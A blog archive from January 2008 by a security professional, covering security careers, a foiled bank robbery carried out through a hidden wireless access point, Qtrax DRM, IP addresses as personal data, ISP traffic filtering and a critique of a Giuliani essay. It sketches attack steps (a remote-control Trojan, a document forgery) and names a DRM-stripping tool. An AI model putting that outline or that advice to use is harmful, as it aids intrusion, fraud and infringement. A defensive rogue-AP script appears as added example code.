Archive for January, 2008
Don Parker at SecurityFocus has an article called Skills for the Future about how to get a job in information security. He outlines one path, and while I don’t deny it’s a good one, and probably the most common, it’s not the only way, either.
There are quite a few different areas of specialization within information security. The one people most often think of is the network security specialist — someone familiar with configuring firewalls, network intrusion detection systems, routers, and distributed defense mechanisms like anti-virus and patch management. These people are primarily charged with securing the perimeter.
However, there are others. I’ve made my career mostly in application security — studying how to develop software to be secure, so that even if perimeter defenses fail and an attacker can interact with an application, they’re unable to take control of it. This requires different skills than the network security path — specifically, it’s important to know several programming languages, have a background in software engineering, and be familiar with how application exploits are constructed (stack buffer overflows, heap overflows, pointer arithmetic issues, command injection, cross-site scripting, etc.) and the various defenses that exist against them (both coding techniques and tools like DEP/NX, GS, ASLR, SAL, etc.)
Other specializations in security include compliance auditing and penetration testing. Compliance auditing is less technical, and involves ensuring that internal controls match up with various regulatory and industry requirements, but often those requirements are security-focused. With recent regulations like SOX and industry standards like PCI DSS, there’s an amazing amount of demand for compliance auditors. Penetration testing is often seen as the most “glamorous” of information security jobs, as it essentially amounts to being hired by companies to hack into them. It requires a very broad array of security knowledge, since the best way into a system is wherever the system is weakest — sometimes this will be network security, other times application security, and other times the people operating and configuring the system. Thus, flexibility is key. However, due to the “mystique” of penetration testing, there are more people who want to be pentesters than are qualified for the job, and more people qualified for it than there is demand for it, so it’s not a very good entry point for the security industry.
There is one thing that is important to success in the information security industry — what I call the “security mindset.” You have to be the sort of person who, when you look at a system, thinks about what’s wrong with it. In my experience, some people have just always thought this way, and some people never do. For example, in The Art of the Steal, Frank Abagnale mentions a man who happened to share a name with a notorious drug dealer. As a result, he had to carry a letter from the Department of State to show to airport security whenever he tried to fly internationally, as his name would come up on every imaginable no-fly list as someone to be detained. What do you think of when you hear this story?
For me, the immediate thought was, “Oh, so if I were wanted by police and needed to flee the country, I could just forge a letter from the Department of State saying that I was not really the wanted criminal who happened to share my name. It’d be easy enough to find out the name of some undersecretary in the State Department and get a copy of their signature. If you wanted to be really authentic, you could also buy a phone and give it to a friend who would impersonate the State Department for you, preferably one with a fax machine in case they ask for any corroborating documentation. Of course, you’d best use a prepaid cell phone so your friend doesn’t get caught, either.” It’s just how security people think — we look at a system or a countermeasure, and see how it goes wrong, and what bad assumptions the system makes. This is important because the attackers think the same way — if we can think of a weakness, they can, too, so it’s important to shore up those weaknesses. Software testers often have the same mindset — it helps them find bugs, by finding the things developers didn’t think of.
So, if you want to get into security, and you aren’t right now, what do you do? There are a few preparatory steps:
- Get at least a year or two of real-world experience in a related field — network engineering, software development, systems administration, IT consulting. You can’t get by with security knowledge alone — you have to know how to secure something.
- Get a CISSP certification. The CISSP is a great breadth-oriented certification — it shows that you know at least the basics about all aspects of security, and have knowledge outside a narrow domain. It does have an experience requirement — three years of work in one of the 10 CBK domains — but the domains cover practically everything in the IT industry, so as long as you’re not fresh out of school you can likely meet it. The CISSP exam isn’t so easy you could pass it with no experience, but it’s not very difficult, either. You’ll also learn a lot studying for it — no matter what your specialization is, it will cover areas you know nothing about (cryptography, physical security & life safety, and disaster recovery are new to a lot of prospective CISSPs.)
After that? If you really want an information security job, you really have to focus in that direction. Once you have a couple of years of experience in a related field, don’t keep taking jobs in that field — look for security jobs. If you’re not in a major metropolitan area, this can be difficult. However, I know from experience that I spent far too much time in general development jobs with a little bit of security exposure when what I wanted to do was full-time security work. I would try to get security-related assignments, doing security testing and fixing security bugs, but there’s only so much security experience you can get when it’s not your main focus, and prospective employers know this. What launched my security career was being willing to jump into an IT security job even when it was in a less desirable area for me (network & infrastructure, when my specialization was development) and involved a substantial pay cut. What that first job is doesn’t matter that much — once you’re there, you’ve gone from a person who wants to be in information security to being an “IT security professional.” It’s easier to move around to the job you want once you have a foot in the door. Remember, in the modern technology industry people often don’t stay in a job for more than 12-18 months; it’s not a lifetime commitment to take a less-than-ideal job.
Many people ask about certifications and their importance to a security career. I would say that the CISSP is vital — many employers use it as a quick check of whether you’re a “real” security person. However, beyond that, there are many things that can be useful, but that experience can substitute for. I do see some value to the following:
- ISACA’s CISA certification. This is highly valued if a.) you want to go into compliance auditing, or b.) you want to work for a large consultancy. If you want to do internal, very technical security work for a corporation, it’s not important.
- Microsoft’s MCITP certifications (or their predecessor, the MCSE.) It’s a nice thing to have on your resume, showing you know a lot about Windows environments, which make up most of the corporate world. Unfortunately, these certifications are extremely test-focused. On the plus side, it means that you can pass them with no experience, just studying for the test. However, it also means that even if you have a ton of experience, you still have to study a lot for the test, as they cover a great deal of material that is rarely used in the real world (e.g. unattended deployment scripts for servers) that you’ll just have to memorize. There is a problem of “paper MCSEs” who have passed the test but know very little, which has devalued the certification in industry, but it’s still useful.
- For application security specialists, having something to show your development experience is good. Microsoft’s MCPD certification or Sun’s SCJP certification can do this. Your first job in application security isn’t going to be reviewing kernel architectures — most of the world’s applications are managed code, either .NET or Java. Thus, these are a good place to start.
I think that the technical certifications are very helpful for getting initial jobs, especially since they don’t have experience requirements like the CISSP. However, they do have a useful life — once you’re making $100,000 per year or more, no one will ever ask, or care, if you have an MCITP, MCPD, or SCJP. They show technical knowledge if people don’t have any other way to know if you have it — but a long career in IT or development will show technical knowledge even better.
The most important thing is to be good at more than one thing. Security is a broad field by its nature — attackers go for the weakest point in the chain. There’s a larger market for security generalists than specialists in any one area, and even the specialists need to have a general background. If all you can do is firewalls, you’re competing for a smaller pool of jobs than if you can do firewalls, but also UNIX or Windows sysadmin work, or programming.
Semi-Electronic Bank Robbery
The AP has a story about an electronic bank robbery foiled when a bank employee pulled the plug on the robbers’ network connection. Apparently the robbers had gained physical access to the employee’s workstation at some point, and installed “advanced technical equipment” underneath the desk to remotely control the computer.
I would guess that the “advanced technical equipment” consisted of a cheap consumer wireless access point. The attack probably went something like this:
- Gain unsupervised access to the machine in some way, either by breaking in or by impersonating someone with legitimate physical access (e.g. a cleaning crew.) Perhaps it’s an inside job and one of them does have legitimate physical access.
- Install a wireless access point behind one of the computers configured as a network bridge, so it can be remotely accessed without setting foot in the bank.
- Bring the computer up offline (using some external boot media so no passwords are required) and install a remote-control Trojan — either some VNC variant or a system designed for use as a surreptitious Trojan like CdC BackOrifice2K.
- Wait until the next day when the user has authenticated but walked away from their computer, take control of it from a van across the street, and begin transferring funds.
As for the somewhat dramatic line “By pulling out the cable to the device, the employee managed to stop the intended transfer at the last second,” this is obviously meant to evoke movie scenes where there’s some progress bar on the screen marked “Transferring funds…” that gets interrupted at 99% by the heroic employee cutting the cable. However, what’s more likely is that the employee looked at his computer, noticed the mouse moving on its own, clicking buttons to transfer funds and entering in an amount. Before the button to confirm the transaction could be pressed, the remote control was disconnected so the transfer was never started.
This is an interesting attack in that it doesn’t really fit the profile of a traditional bank robbery, but neither is it a completely electronic theft. The attackers had to have had physical access to the bank, but they didn’t use it to get at the money — they used it to get to the computers.
Security measures are targeted. The bank’s physical security consists of cameras watching teller stations and heavy vault walls and doors guarding the money. This is targeted at stopping two attacks — the vault stops simple burglary (walk in at night and grab the money), while the cameras detect employee fraud by tellers and armed robbery by customers. Meanwhile, the bank’s electronic security consists of firewalls, intrusion detection systems, and access control systems that stop people from outside the bank from accessing the systems.
This attack went around both. The physical security was not set to stop people tampering with desktop computers — there’s no money there! Someone was thus able to either sneak in or social-engineer their way to the desk and tamper with equipment undetected. The electronic security is not meant to stop someone actually sitting at a computer who has logged in with legitimate credentials — they’re supposed to be able to move money around. By combining an electronic breach with a physical one, the attackers managed to be “sitting at the computer” while actually nowhere near it. It’s an ingenious plan, and one of those rare cases where a rather elaborate “heist movie plot” sort of attack was attempted.
They were stopped by one of the most powerful countermeasures available — a vigilant employee. However, there is a lesson to be learned from this: Physical security is important! If an attacker has unmonitored physical access to hardware, he can modify it to do anything he wants. No passwords or credentials are needed if he can reboot the system with a flash drive or CD-ROM. How many of your company’s electronic countermeasures would be rendered useless by an attacker who could remotely control a computer inside the perimeter, or even just had a network tap to the internal network behind the firewall? In most companies, it’s not too hard to gain physical access, usually by impersonating a service employee of some kind (janitorial staff, phone company employee, etc.) Presumably the attackers who had physical access were in a hurry, since they put the AP under the same computer they were controlling; with more time, they could have compromised one computer and hidden the AP somewhere entirely different, making it harder to find and pull the plug. Of course, if the employee was thinking clearly (and he probably was, since he thought to pull the plug at all), he still could have simply switched the computer off, so this wouldn’t have done a lot of good.
Also, it’s worth periodically searching for rogue access points. Not only might an attacker install one deliberately, but employees in businesses without wireless networks have been known to install a wireless AP under their desks simply for convenience. Often, these are configured very poorly, with no security or encryption at all. Rogue APs can be detected in a variety of ways; if you have the luxury of having access to a product like Aruba Networks’ RFProtect (which was called Network Chemistry last time I used it, but seems to have since been acquired by Aruba), monitoring can be automatic and continuous. If not, there are still open-source rogue scanners, and even simple tools like the aircrack-ng suite can be used to look around, though it’s considerably less automatic (and thus more time-consuming) to do it that way.
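As an added illustration of the manual route (this is example code, not from the post or any of the products named), a small Python triage of a wireless survey: it assumes a constructed CSV of observed access points in a column layout of my own, a placeholder list of authorised BSSIDs and a placeholder corporate SSID, and it flags unknown radios advertising the corporate SSID as well as open or WEP networks with a strong signal, which is what the badly configured under-the-desk AP in the paragraph above looks like from the air.

```python
"""Triage a wireless survey for rogue access points (added example).

Assumptions (not from the original post): the survey is a constructed CSV
with columns bssid,essid,channel,privacy,power, roughly what a walk-around
with a scanner produces; the authorised-AP list and the corporate SSID are
placeholders.
"""
import csv
import io

# Constructed allowlist of the BSSIDs that belong to the corporate WLAN.
AUTHORISED_BSSIDS = {
    "00:11:22:AA:BB:01",
    "00:11:22:AA:BB:02",
}
CORPORATE_ESSID = "CorpNet"     # placeholder SSID
STRONG_SIGNAL_DBM = -60         # roughly "inside the building" for this example

# Constructed survey output; power is RSSI in dBm (higher = closer).
SURVEY_CSV = """\
bssid,essid,channel,privacy,power
00:11:22:AA:BB:01,CorpNet,6,WPA2,-48
00:11:22:AA:BB:02,CorpNet,11,WPA2,-55
DE:AD:BE:EF:00:01,CorpNet,1,WPA2,-52
CA:FE:00:00:00:07,linksys,6,OPN,-41
12:34:56:78:9A:BC,NeighbourNet,11,WPA2,-84
AB:CD:EF:01:02:03,Guest-Setup,1,WEP,-58
"""


def parse_survey(text):
    """Return survey rows as dicts with channel and power converted to int."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["channel"] = int(row["channel"])
        row["power"] = int(row["power"])
        rows.append(row)
    return rows


def classify_ap(row):
    """Return a finding label for one AP, or None if it needs no attention."""
    known = row["bssid"].upper() in AUTHORISED_BSSIDS
    strong = row["power"] >= STRONG_SIGNAL_DBM
    weak_crypto = row["privacy"].upper() in {"OPN", "WEP"}
    if known:
        return None
    if row["essid"] == CORPORATE_ESSID:
        # An unknown radio advertising our SSID: investigate regardless of signal.
        return "evil-twin"
    if strong and weak_crypto:
        # Strong and unencrypted: the classic "convenience AP under a desk".
        return "rogue-open"
    if strong:
        return "rogue-unknown"
    return None  # weak and unrelated: most likely a neighbour's network


def triage(text):
    """Map BSSID -> finding for every AP in the survey that warrants a look."""
    findings = {}
    for row in parse_survey(text):
        label = classify_ap(row)
        if label is not None:
            findings[row["bssid"]] = label
    return findings


if __name__ == "__main__":
    for bssid, label in sorted(triage(SURVEY_CSV).items()):
        print(f"{label:14} {bssid}")
```

Signal strength is a crude proxy for "on our premises"; a second survey from another spot in the building narrows down where a flagged AP physically is.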
This also points out the importance of defense in depth. Host-based firewalls and intrusion detection might detect an attack like this, but traditional perimeter defenses like firewalls and NIDS are useless against it. Layers of security, designed to interfere with different types of attacks, always provide much more security than any single countermeasure.
…Or Maybe They Do
On further investigation, it turns out that there is a reason for the DRM protection on Qtrax downloads… it’s just not to prevent piracy.
When a Qtrax-downloaded file is played, the WMA licensing notifies Qtrax of the act — so that they can divvy up advertising revenue from the site based on what people are listening to. Since the Windows Rights Management system lets them require a bit of netcode to be run when you listen to a song, this works.
However, it still won’t fix the existing problems with DRM — specifically, that non-DRM-enabled players won’t be able to play the files (they claim they’ll be offering iPod-compatible tracks, and worry about Apple blocking them, but there’s no word from them on how they’ll do this, since WMDRM tracks won’t play on iPods) and mobility between machines is difficult. People will still be motivated to rip the DRM off the tracks (thus breaking Qtrax’s tracking system) for convenience, or to turn to pirate downloads.
My guess is that Qtrax would prefer to pay labels based on downloads, not song plays, but the labels wouldn’t go for it, or just couldn’t stand the very concept of releasing unencumbered tracks for free no matter how much ad money they got.
If this was the way the labels had released music to begin with, I think consumers would have been happy with it. But now, after the history of DRM, I think the public perception of “bad juju” around anything DRM-encumbered may sink it. We’ll see, though — legal and free pulls a lot of weight with consumers.
So, there’s been a lot of news about Qtrax, a new music download service approved by the major record labels. It sounds like a good thing for consumers — a Songbird-based browser lets you select pretty much any song imaginable, including the entire catalog of songs available from iTunes, and download it freely and legally. Now, since it’s peer-to-peer, presumably not every song will be available at first, but they’re all licensed, so as soon as anyone makes them available they will be easy to acquire and free to download. (Though I don’t know for certain; it’s possible that Qtrax has its own server that will share out files if there are no other peers that have them.) The system is ad-supported, with Qtrax turning over most of the ad revenue to the labels in exchange for the licenses.
But here’s the weird part — all the downloads are Windows Rights Management-protected WMA files. There’s DRM on them; you are allowed to put them on a mobile device of your choice, but can’t spread them to other computers. This seems faintly ridiculous — they’re free. What does the DRM prevent you from doing? Copying your free files from one of your computers to another rather than having to pay the price of $0 twice? Giving your free files to others, rather than making them download them for free?
What this will really do is show that customers actually mean it when they say they hate DRM not because it prevents them from pirating media but because it simply gets in the way of how people actually use their music. For instance, I place all my music files (ripped from my own CDs) on a central server and then can access them from any computer in the house. With these DRM-protected files, I couldn’t do this; I would have to have a copy of the entire music library on every computer in the house, because each would have different DRM codes.
However, this also demonstrates that the record companies don’t understand how DRM works — they’ve set up the ultimate trusted client scenario. When you download a file, free, from Qtrax, you get both the file and the license key for it. Which means you can just run FairUse4WM (an easy-to-use, free utility) on the file and strip the DRM right off. It’s quick, easy, and instantaneous so long as you have the key — which on a Qtrax download, you do. If you give everyone the keys freely, DRM becomes completely ineffective. In fact, with their Songbird-based architecture, I bet you could even write a plugin for Qtrax that would strip the DRM off automatically using FairUse4WM as you downloaded files.
Anyone who actually wants to pirate music will figure this out. The only people who won’t are, of course, the legitimate end users who just want to listen to music on multiple computers and devices. For those users, getting unprotected music will mean turning to the Pirate Bay.
Updated: it turns out that there is a reason for the DRM, it’s just not to prevent piracy.
Peter Scharr, Germany’s Commissioner of Data Protection and head of the European Union’s privacy working group, has stated that information identified only by IP address must be considered personally identifiable information. As the AP article points out, this could have rather serious implications for search engines and many other electronic businesses, and RSnake is concerned about it messing up the entire advertising business model of the Internet.
First, for those not working in the information security industry: something being classified as personally identifiable information (PII) is a big deal. If data is PII, you are liable for damages if the data is ever released, and you are required by statute to take significant and often expensive measures to protect it. If you’re a public corporation, Sarbanes-Oxley requires you to do all sorts of things to protect the data (e.g. encryption.) If your company takes credit card payments, the Payment Card Industry Data Security Standard requires you to do even more (e.g. physical protection of the hardware the data sits on, specific firewall/router configurations, etc.) Most large companies have their own standards for how PII must be protected that combine or even go beyond the regulatory and industry requirements. Overall, the required protections around PII are onerous enough that companies strive to minimize how much PII they have at all — it’s often cheaper and easier to just delete the data than to protect it the way you need to protect it. Companies must make the decision of “How much business value do we get out of storing, say, our customers’ addresses, and does it exceed the cost of protecting that data?” Often the answer is no.
On the surface, calling IP addresses PII is ridiculous. IP addresses are found on every packet anyone sends on the Internet; if IP addresses count as a personal identification, then logging basically anything about Internet traffic makes the logs PII. It takes a label currently applied only to a small amount of high-value data and applies it to something that everyone everywhere logs; it seems absurd. But as I think about it more, I’ve come to realize that Scharr has a point.
The EU is much more aggressive about privacy law than the United States. The United States Constitution guarantees privacy from the government through the Fourth and Fifth amendments; this sharply limits what the government can collect on you and what it can do with the data it does collect. However, there is no Constitutionally or legislatively defined general right to privacy — anyone can collect whatever data they want, so long as they’re not a branch of government. This is usually an adequate protection against government abuse, but it does mean the private sector can accumulate a frightening amount of data about you, and that could be prone to abuse as well. EU nations, on the other hand, often have a general right to privacy, and much of the data collection that is taken for granted in the United States is illegal there; in addition, even where the data may be stored, sharing it with any third party without express user consent is almost always illegal.
If IP addresses are PII, what really happens? A lot of current practices would have to change, but changing a practice is not the same as breaking the scenario it serves. Remember, the privacy issue isn’t with transmitting or using IPs — it’s with storing them or sharing them with a third party.
- Currently search engines like Google use your IP to identify where you are geographically, so as to establish search profiles for regions and target ads. They store the first 24 bits of your IP (dropping the last octet) as a proxy for location. They would need to switch to storing a different proxy for location (e.g. latitude and longitude), though they could still base this proxy on your IP.
- Pay-per-click ad networks would still function. When they’re clicked, the ad network records the click (so as to be able to bill the advertiser), then issues a 301 redirect to the advertiser, who also records the click (to know it happened and the ad was effective.) These records would need to leave out IP, or be protected as PII. Lacking IP, however, would make detecting and preventing click fraud (spoofed clicks, or many clicks from the same person) much more difficult. Currently a skilled fraudster can evade IP-based click-fraud prevention, but losing even that would make click fraud easy. Also, without IP addresses, the ad networks would have a hard time proving to advertisers that clicks were real if an advertiser chose to sue them. Large ad networks would probably have to just eat the cost of protecting their logs as PII.
- Contrary to RSnake’s comment, I do not think this would affect embedded content. Embedded content comes in two forms — content linked to on a page, which your browser loads (objects), and content retrieved by the server and displayed on the page (mashups.)
  - In the object case (e.g. viewing a YouTube video on someone’s web page), the web site owner is not leaking your IP to the third party — you are. The web site is not sending your IP to YouTube at all; your web browser is sending it in response to a link tag in the page.
  - In the mashup case (e.g. web pages that get data from an API, like Facebook pages, pages embedding Google Maps, etc.), the web site owner is also not leaking your IP to the third party. You access the site, and then the site accesses the third party not as you, but as itself. The site leaks its own IP, not the customer’s. No PII is released.
- Sites that do user tracking (via logins, or by simply recognizing users between sessions) would be unaffected; they use cookies, not IP, to track users. Most ad networks work this way, too.
- The biggest change, though, is to simple website logs. Currently every time you access any web page, it makes a note in a log of your IP and which site you accessed, which is used for statistical analysis, forensics, etc. Even this blog is doing it; with most web providers you can’t even turn this logging off if you want to. Sites will either have to stop doing this or take substantial steps to protect the logs (or else be subject to significant statutory liability if they don’t.) Not keeping logs is, from a security perspective, very dangerous — if something happens, you have no idea what happened and thus may not be able to fix it.
However, despite all that cost and difficulty, when you think about it… IP addresses really are personally identifying. If you have an always-on broadband ‘net connection, your IP address changes very rarely (maybe only once in several months), so all your web traffic everywhere, complete with your search queries, emails, etc., can be tied together with that number. Your ISP can connect that number to your name, address, etc. If you’re at a corporation, the IP is tied to a corporate gateway or proxy… which has logs tying each communication (based on date and time) to your desktop’s IP, which once again likely uniquely identifies you (unless you always compute from a shared machine.)
IP is a unique identifier for confirming identity, but not so much for initially finding it. In other words, if someone attacks my website, and I have only their IP address, it may not do me much good in finding out who they are unless I can get someone with subpoena powers to get it from the ISP. However, if I suspect a specific person of something, I can probably find out their IP and check it against my attacker’s IP, thus confirming their identity. Likewise, if I am an ad network or search engine with a lot of IP data, I don’t know who you are based on your IP, but the commonality in IPs between all the data I have may enable me to figure it out based on data aggregation.
I think this is a case where something is considered ridiculous merely because it changes things. Yes, a lot of business models and current practices would have to change if IP-as-PII became the default assumption. Yes, it would make some security people’s jobs harder, and cause web providers to incur a lot of costs. But does that mean it’s wrong? Perhaps what it means is that current businesses & web sites under-value their users’ privacy, and are freeloading while providing inadequate protections. It’s a different world if we have to discard IPs or protect them as PII, but I’m not convinced it’s a worse one.
Broadband Steps Backwards
The recent news from broadband providers seems to be all about how to make their product less appealing to customers.
First of all, the AP reports that AT&T is still considering filtering backbone traffic. They say they’ve noticed the massive amount of copyrighted data being shared over P2P networks, and feel a need to do something about it — “It’s like being in a store and watching someone steal a DVD. Do you act?” However, I think it’s likely that this is not just AT&T having an attack of conscience (not exactly something Ma Bell is known for), but rather AT&T being pressured by the usual suspects, the MPAA and RIAA.
They’re looking at this as a security problem — how do we stop unauthorized traffic (piracy) while allowing authorized traffic? From this perspective, it’s tractable — the technology exists to do it, albeit clumsily (you either miss a lot of piracy or you throw out a lot of legitimate traffic.) However, this is more than a security problem — there are legal and business problems here that in my opinion should overwhelm the security concern.
I’m surprised that AT&T is actually considering it. Currently, AT&T is shielded from lawsuits over content carried over their network by having “common carrier” status — they do not discriminate based on content. If they begin discriminating based on content, they may cut down on music and movie piracy — but they also render themselves vulnerable to being held liable for what music and movie piracy does occur. Perhaps the MPAA and RIAA have offered to indemnify AT&T in exchange for its help with the filtering. There is another problem with filtering, though — AT&T’s Internet backbone lines carry a staggering amount of traffic, so any kind of filtering would of necessity have to be very rudimentary or the processing power requirements would be enormous. Essentially, they would have to do something like what Comcast did with the Sandvine system — just interfere with all BitTorrent (or other P2P) traffic, without making any attempt to differentiate between legal and illegal content.
Perhaps AT&T has another ulterior motive, though — P2P traffic is representing an increasing proportion of all Internet traffic, at this point more than half. If killing P2P would drop AT&T’s bandwidth requirements by 60% while not affecting their revenue, this would have to be tempting for the corporation.
The increasing amount of P2P traffic is causing another major Internet company to consider sabotaging their own business — Time-Warner Cable. Ars Technica reports that Time-Warner is considering switching to metered rates, where users pay different amounts based on how much bandwidth they are using. They’re undoubtedly considering this due to the public’s reaction to Comcast’s filtering of P2P traffic (outrage and lawsuits.) Cable companies are in a bind — they built their networks under the assumption that traffic is extremely asymmetric — many users send small amounts of traffic (requests, acknowledgments) to centralized servers which respond with large amounts of traffic. This made sense when almost all Internet traffic consisted of web pages, but P2P networks destroy this assumption, with each user uploading as much, or more, than they download. Essentially, with P2P everyone is a server, and the cable companies simply can’t handle this without massive, expensive upgrades to their entire infrastructure. Their problem is one of failure to plan — they didn’t see this coming, and spent billions of dollars in capital building the wrong network. Even without piracy, P2P would be an increasing proportion of Internet traffic today — the world has changed, and it won’t be changed back again.
On one hand, metered pricing is fair. Right now, the people who use P2P are getting their Internet connections below-cost — we’re unprofitable for the ISPs, who can only support us because the masses of people who do nothing but occasional web-surfing are so profitable that they subsidize P2P users and result in an overall profit for the ISP. ISPs can afford to offer “unlimited” broadband only so long as they can be sure almost no one will use it. With metered pricing, heavy users pay for their heavy use, and light users can pay less since they don’t have to subsidize the heavy users. On the other hand, there’s a problem — customers despise metered pricing, especially when they’re used to flat-rate. In the 90’s, phone companies experimented with metered local service, and it was outrageously unpopular even with people whose phone bills decreased as a result. Sure, they were paying less, but now they felt limited.
Switching to metered pricing will indeed save money. However, it will do so by driving away customers, starting with the unprofitable heavy users. Perhaps this is intentional — banks set up their fee structures to drive away unprofitable customers, too, so it’s not unprecedented. But in the long run, P2P use is increasing, and the old usage patterns are decreasing — if the networks don’t adapt to this, eventually they’ll have no customers left. Competitors like Verizon FiOS, which (due to a fiber-optic last mile) don’t need to limit upstream bandwidth and have been built in the modern P2P world, will kill off any network that tries to live in the past.
Today I found a link to an article by my least-favorite current presidential candidate, Rudy Giuliani. I was expecting a cavalcade of fear-mongering — his usual stock in trade — but discovered to my surprise an article entitled “The Resilient Society.” This gave me pause, as resilience is precisely what I believe must be the necessary societal response to the distributed threat of terrorism. Security must be divided into prevention, detection, response, and recovery — resilience is the ability to quickly recover from attack at as low a cost as possible. Resilience is the difference between a society changing its entire way of life in response to a terrorist attack vs. society being able to return quickly to normalcy, thus making itself impossible to terrorize. I was not expecting to hear about resilience from Rudy Giuliani — after all, this is the one aspect of national security that cannot be centralized around an all-powerful government (Giuliani’s obvious goal), but rather relies on the distributed strength of every citizen. Was I about to actually agree with an article by Giuliani?
It turns out that I had nothing to worry about. Despite its title, there are only four paragraphs about resilience in the 41-paragraph article, and even those are wrong.
So what does Giuliani think must be done to defend a society from terrorism? Primarily a command-and-control response process combined with offensive attacks on the sources of terrorism.
With regard to prevention, Giuliani favors deployment of massive detection nets to fight against the attacks we’ve already faced — radiation and biohazard detectors at every port and point of entry. The cost-benefit ratio of this would be astronomically poor; as a free society with mostly open borders, there are a phenomenal number of entry points to the United States, and only very rarely (possibly never, so far, though the government would not be likely to tell us if it did happen) does anyone try to smuggle weapons-grade nuclear material or biological weapons through it. This isn’t to say that these measures would do no good, but they protect only against specific attacks and are obvious. They signal to terrorists “you can’t bring a nuclear or biological weapon through a shipping container in a port,” thus letting them know they should instead a.) use conventional weapons, b.) acquire nuclear/biological materials already inside the United States, or c.) enter via uncontrolled border space. If I, in three minutes, can think of three easy ways around a measure that will take billions of dollars to implement, it’s not very cost-effective.
He discusses the difficulties in information sharing between law enforcement and military agencies, clearly seeing these as an unalloyed negative. He’s right that there have been clear communications breakdowns, where these organizations had information that they were legally free to share, but chose not to out of myopia or the desire to preserve the institutional sovereignty of their silo. Despite the Central Intelligence Agency being founded to ensure all military and civilian intelligence agencies share information, it has in many cases become the most isolated hoarder of information of them all, and this is a problem. However, in other cases the obstacles to information-sharing are the civil liberties guaranteed by the Constitution. Giuliani has no issue with sweeping these away — this is, after all, the person who claims “Freedom is about authority. Freedom is about the willingness of every single human being to cede to lawful authority a great deal of discretion about what you do. You have free speech so I can be heard.” (That quote is not taken out of context in any way. He did not, however, go on to add “War is Peace. Freedom is Slavery. Ignorance is Strength.”)
Judicial oversight is not inimical to detecting and stopping international terrorism. Judges do not want terrorist attacks to happen, either; these protections exist to ensure that normal people are able to live their lives without constant monitoring. Surveillance is not unintrusive. Command-and-control executives like Giuliani think that it does not matter if people are being watched, as only the “bad guys” will be prosecuted, but this simply isn’t true. First of all, people change their behavior when they know they’re being watched. It has a chilling effect not just on actually criminal behavior, but also on any behavior that people consider “socially unacceptable.” Surveillance drives everyone toward the mainstream center of society, homogenizing them; it creates the very opposite of a free society. (For a chilling illustration of this, I highly recommend Charles Stross’s sci-fi novel Glasshouse, one of the best and most terrifying books I’ve ever read, though it requires a high tolerance for transhumanist concepts.) Second, who watches the watchers? Even if Giuliani’s motives are pure (they’re not), and he wants to use these tools of warrantless surveillance, imprisonment without trial, etc. only against international terrorists, no one can possibly believe the entire law enforcement apparatus of a 300-million-person nation is entirely free of corruption and petty tyranny. Security has a cost — Giuliani looks only at how these measures benefit security, ignoring their unintended consequences. Security is of limited value — a terrorist attack is tragic but it does not end the world. We must not embrace “security at any cost” — instead we must consider security at a cost that we can bear, and most importantly, not allow the cost of security to exceed the cost of terrorism.
Giuliani also wants a “good Samaritan” law for people who report suspicious activity, protecting them from lawsuits. This is a terrible idea. Lawsuits are there to provide a cost for making a false or frivolous report — people will still report the man walking down the street with a pile of dynamite, but they think twice about reporting possibly-suspicious but almost certainly innocuous activity, like speaking Arabic in an airport, or loitering in a parking lot. Making reporting costless means you’ll get an inevitable excess of it, resulting in both the chilling effect of universal surveillance and a waste of law enforcement’s time. When people are encouraged to report everything unusual, you drown in reports and make people paranoid. This teaches people to react to the unknown with fear — that is, it accomplishes precisely what terrorists aim to accomplish. People reporting suspected terrorist activities should not be immune from lawsuits; rather, courts should decide whether the report was reasonable and take appropriate action. Often the reporters should be held blameless, having had a reasonable reaction that turned out to be incorrect, but doing so automatically makes filing false reports a simple way for private citizens to use the nation’s law enforcement apparatus as a means for private revenge.
Giuliani also calls for “tamper-proof biometric ID cards” for all non-citizens. As a security professional I can’t help but chuckle when anyone uses the word “tamper-proof.” But there’s nothing terribly wrong with this… except that it doesn’t do any good. We already know when people enter the country legally, and we identify them then; if they sneak in, they’re not going to have a “tamper-proof biometric ID card” any more than they have a regular ID card now. In addition, identity alone does not provide security. The fact that you know who someone is does you little to no good if he does not have a background in committing terrorist acts. And if he has a background in committing terrorist acts, why would you hand him a “tamper-proof biometric ID card?” Just deport him!
Giuliani supports fences around borders and stepping up guards, but claims to want to avoid turning the nation into a “fortress” in order to “deepen the connections between America and the Islamic world that will prove essential in prevailing over radical Islamic extremism.” On one hand, he’s on to something there — the only way to truly prevent terrorism is to eliminate the motivation for terrorism. Otherwise, 100% prevention is impossible — total prevention requires that you succeed every time, while the villains only have to succeed once. On the other hand, he simultaneously advocates precisely the foreign policy that creates that motivation — worldwide interventionism and American control and support of often-corrupt foreign governments. Now, the fact that a given policy makes people want to kill you doesn’t necessarily mean that that policy is wrong – but it is a cost of that policy that must be taken into account, and to claim that it will not have this effect is disingenuous.
Stepping up epidemiological surveillance and data gathering is the one good idea Giuliani has. Not only would it be helpful to detect bioterror attacks, but more importantly, it can help detect and contain natural pandemics. The emergence of a serious disease threat at some point in the future is a certainty, and unlike surveillance of people’s activities, this sort of surveillance has very little civil liberties cost.
Giuliani is obviously very proud of New York’s CompStat method of crime detection and prevention, given his desire to apply the same methodology to everything. For terrorism and border control, it makes some sense, as these are essentially law enforcement problems with a lot of parallels. However, for emergency preparedness it does not. Dividing up funding based on “need” determined by a statistical formula is absolutely certain to result in “gaming the system.” Emergency preparedness must be decentralized; there is no way for the Federal government to take care of it on a nationwide basis, or even to effectively coordinate and monitor it. Fundamentally, preparedness requires having appropriate materials on site and appropriate plans made, and no one can make those plans from afar.
Finally, Giuliani gets to the putative subject of the essay, resilience. He says, rightly, “Government should harness the inherent strength of the American people and the private sector in order to build a society that may bend—but not break—if catastrophe does strike.” It is somewhat ironic to hear this from Giuliani, who has just spent the preceding 30 paragraphs calling for increased central control of everything. His entire resilience proposal is as follows:
- Create government-organized response teams of private citizens who have been trained and equipped by government to respond to disaster,
- Pass a law shielding people from lawsuits if they are trying to help in disaster response, and
- Set government standards for how businesses, citizens, and charitable organizations should respond to disasters.
Ah, for every problem a government solution. This is precisely what resilience isn’t. A resilient society is one that responds to and recovers from disaster on its own — one that is not broken by disaster but continues to function mostly unchanged. The model of a resilient society is England during the IRA period: terrorist attacks happened, and life went on largely unchanged.
Western society is still phenomenally resilient, but not as much as it once was. You cannot build a resilient society using only government. A resilient society comes from a variety of factors, and these can do more to protect against the impact of terrorism than any technological or centralized security measure. They include:
- A culture of hope. People have to believe that every terrorist attack is an aberration, and that life will return to normal. This is what prevents a localized disaster from having repercussions on an entire nation for years to come; without this, with a culture of fear instead, the damage of a terrorist attack is multiplied a hundredfold.
